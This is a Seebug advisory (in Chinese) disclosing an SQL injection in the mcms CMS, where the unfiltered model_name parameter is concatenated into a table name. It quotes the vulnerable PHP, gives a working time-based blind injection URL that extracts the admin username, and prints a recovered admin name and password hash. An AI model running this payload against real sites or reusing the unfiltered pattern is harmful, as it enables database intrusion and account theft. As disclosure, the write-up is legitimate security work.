mcms最新版任意表的任意字段SQL注入漏洞

2015-03-03T00:00:00
ID SSV:95219
Type seebug
Reporter Root
Modified 2015-03-03T00:00:00

Description

简要描述:

mcms最新版任意表的任意字段SQL注入漏洞

详细说明:

前两天在wooyun提了两个漏洞,一天就确认修复了,而且出了新版本,那我就去官网下个最新(v_3.1.1.enterprise)的来学习学习。 注入一枚:GET /app/user/info.php?m=change_model&ajax=1&info_id=1&model_name=product GET中有个参数model_name,这个参数是用来与数据表前缀(TB_PRE)拼接需要操作的数据表的表名的,在获得model_name时并没有过滤,因此,在数据表名可就可以进行注入了,当然,可以利用任意表的任意字段来进行注入。 看看代码/app/user/info.php

//切换模型的表单HTML function m__change_model(){ global $dbm,$C; $model_name=isset($_GET['model_name'])?$_GET['model_name']:''; $info_id=isset($_GET['info_id'])?intval($_GET['info_id']):0;//print_r($model_name); $model_fields=array(); if($info_id>0) { $sql="select * from ".TB_PRE.$model_name." where info_id='$info_id' limit 1"; $rs=$dbm->query($sql); if(count($rs['list'])==1) $model_fields=$rs['list'][0]; } if($model_name!='') die($C->show_model_form($model_name,$model_fields)); die(''); }

$model_name直接通过GET获取,没有经过过滤处理,也没有进行表的属性判断就与表前缀进行了拼接,因此,这里可以实现任意表的任意字段注入。 Payload:GET提交

/app/user/info.php?m=change_model&ajax=1&info_id=1&model_name=product/**/where/**/info_id=-1/**/or(select/**/if(ord(mid((select/**/login_name/**/from/**/mcms_user/**/limit/**/0,1),1,1))%3d108,sleep(1),0))%23

因为是time-based blind 注入,猜测管理员用户名的第一个字母时,若错误,延迟2s。如下图

<img src="https://images.seebug.org/upload/201502/26215056cf779a9da79a93b0a15a30ef217b825b.jpg" alt="猜测错误副本.jpg" width="600" onerror="javascript:errimg(this);">

若正确,则延迟5s(视环境而定,可自行缩短延迟时间),如下图

<img src="https://images.seebug.org/upload/201502/262151111d5f0a5c8b13ff56538863dfb6e3f49e.jpg" alt="猜测成功副本.jpg" width="600" onerror="javascript:errimg(this);">

按上面的方法依次做下去(burp intruder或者自己写个脚本跑),可测试管理员用户名为:mcmsadmin,密码为: 891c796e40d55cabc96051ca971c1894

漏洞证明:

见 详细说明